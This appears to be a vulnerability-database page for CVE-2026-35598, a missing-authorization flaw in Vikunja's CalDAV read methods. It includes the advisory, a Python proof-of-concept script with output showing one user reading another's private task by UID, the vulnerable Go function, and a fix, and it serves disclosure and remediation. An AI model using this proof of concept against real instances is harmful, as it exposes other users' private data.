Skip to main content

Python CVE-2026-35598

| EUVDEUVD-2026-21425 MEDIUM
Missing Authorization (CWE-862)
2026-04-10 https://github.com/go-vikunja/vikunja GHSA-48ch-p4gq-x46x
4.3
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
4.3 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
None
Availability
None

Lifecycle Timeline

4
EUVD ID Assigned
Apr 10, 2026 - 16:00 euvd
EUVD-2026-21425
Analysis Generated
Apr 10, 2026 - 16:00 vuln.today
Patch released
Apr 10, 2026 - 16:00 nvd
Patch available
CVE Published
Apr 10, 2026 - 15:34 nvd
MEDIUM 4.3

DescriptionGitHub Advisory

Summary

The CalDAV GetResource and GetResourcesByList methods fetch tasks by UID from the database without verifying that the authenticated user has access to the task's project. Any authenticated CalDAV user who knows (or guesses) a task UID can read the full task data from any project on the instance.

Details

GetTasksByUIDs at pkg/models/tasks.go:376-393 performs a global database query with no authorization check:

go
func GetTasksByUIDs(s *xorm.Session, uids []string, a web.Auth) (tasks []*Task, err error) {
    tasks = []*Task{}
    err = s.In("uid", uids).Find(&tasks)
    // ...
}

The web.Auth parameter is accepted but never used for permission filtering. This function is called by:

  • GetResource at pkg/routes/caldav/listStorageProvider.go:266 (CalDAV GET)
  • GetResourcesByList at pkg/routes/caldav/listStorageProvider.go:199 (CalDAV REPORT multiget)

All other CalDAV operations enforce authorization: CreateResource checks CanCreate(), UpdateResource checks CanUpdate(), DeleteResource checks CanDelete(). Only the read operations skip authorization.

The project ID in the CalDAV URL is ignored. A request to /dav/projects/{attacker_project}/{victim_task_uid}.ics returns the victim's task regardless of which project ID is in the path.

Proof of Concept

Tested on Vikunja v2.2.2.

python
import requests
from requests.auth import HTTPBasicAuth

TARGET = "http://localhost:3456"
API = f"{TARGET}/api/v1"

def login(u, p):
    return requests.post(f"{API}/login", json={"username": u, "password": p}).json()["token"]

def h(token):
    return {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}

alice_token = login("alice", "Alice1234!")
bob_token = login("bob", "Bob12345!")
# alice creates private project and task
proj = requests.put(f"{API}/projects", headers=h(alice_token),
                    json={"title": "Private"}).json()
task = requests.put(f"{API}/projects/{proj['id']}/tasks", headers=h(alice_token),
                    json={"title": "Secret CEO salary 500k"}).json()
# task UID must be set (normally done by CalDAV sync; here via sqlite for PoC)
# sqlite3 vikunja.db "UPDATE tasks SET uid='test-uid-001' WHERE id={task['id']};"
TASK_UID = "test-uid-001"
# bob tries REST API
r = requests.get(f"{API}/tasks/{task['id']}", headers=h(bob_token))
print(f"REST API: {r.status_code}")
# 403
# bob gets CalDAV token
caldav_token = requests.put(f"{API}/user/settings/token/caldav",
    headers=h(bob_token)).json()["token"]
# bob reads alice's task via CalDAV (project ID in URL doesn't matter)
r = requests.get(f"{TARGET}/dav/projects/{proj['id']}/{TASK_UID}.ics",
                 auth=HTTPBasicAuth("bob", caldav_token))
print(f"CalDAV: {r.status_code}")
# 200
print(r.text)
# contains SUMMARY:Secret CEO salary 500k

Output:

REST API: 403
CalDAV: 200
BEGIN:VCALENDAR
VERSION:2.0
BEGIN:VTODO
UID:test-uid-001
SUMMARY:Secret CEO salary 500k
DUE:20260401T000000Z
END:VTODO
END:VCALENDAR

The REST API correctly returns 403, but CalDAV leaks the full task. The project ID in the CalDAV URL is ignored - bob can also use his own project ID and still get alice's task.

Impact

An authenticated CalDAV user who obtains a task UID (from shared calendar URLs, client sync logs, or enumeration) can read the full task details from any project in the instance, regardless of their access rights. This includes titles, descriptions, due dates, priority, labels, and reminders. In multi-tenant deployments, this exposes data across organizational boundaries.

Task UIDs are UUIDv4 and not trivially enumerable, but they are exposed in CalDAV resource paths, client synchronization logs, and shared calendar contexts.

Recommended Fix

Add a CanRead permission check on each returned task's project in both GetResource and GetResourcesByList:

go
tasks, err := models.GetTasksByUIDs(s, []string{vcls.task.UID}, vcls.user)
// ...
for _, t := range tasks {
    project := &models.Project{ID: t.ProjectID}
    can, _, err := project.CanRead(s, vcls.user)
    if err != nil || !can {
        return nil, false, errs.ForbiddenError
    }
}

--- *Found and reported by aisafe.io*

AnalysisAI

Vikunja task authorization bypass in CalDAV allows authenticated users to read arbitrary task details from any project by knowing a task UID, bypassing REST API permission checks. The GetResource and GetResourcesByList CalDAV methods query tasks by UID without verifying the authenticated user has project access, enabling information disclosure of task titles, descriptions, due dates, and other metadata across organizational boundaries in multi-tenant deployments. Patch available in v2.3.0.

Technical ContextAI

The vulnerability exists in Vikunja's CalDAV implementation, specifically in the GetTasksByUIDs function (pkg/models/tasks.go:376-393) which accepts a web.Auth parameter but never uses it for permission filtering when querying the database. The function is called by CalDAV GET and REPORT operations (pkg/routes/caldav/listStorageProvider.go) which fetch task resources by UID without enforcing authorization checks that exist in other CalDAV operations (CreateResource, UpdateResource, DeleteResource all verify permissions via CanCreate/CanUpdate/CanDelete). The root cause is improper authorization control (CWE-862) where the authenticated user context is available but not applied to authorization decisions. The project ID in the CalDAV URL path is ignored during the lookup, allowing requests to any project path to return tasks from other projects if the UID is known. This is a Go-based application using xorm for database access, and affects the code.vikunja.io/api package.

RemediationAI

Upgrade to Vikunja v2.3.0 or later, which includes the authorization fix in PR #2579 (commit 879462d717351fe5d276ddec5246bdec31b41661). The vendor-released patch adds a CanRead permission check on each task's project in both GetResource and GetResourcesByList CalDAV methods before returning task data. If immediate upgrade is not feasible, disable CalDAV access for unprivileged users as a temporary mitigation, though this requires architectural changes to Vikunja's user and authentication management. See the GitHub security advisory at https://github.com/go-vikunja/vikunja/security/advisories/GHSA-48ch-p4gq-x46x for full details and the release at https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Share

CVE-2026-35598 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy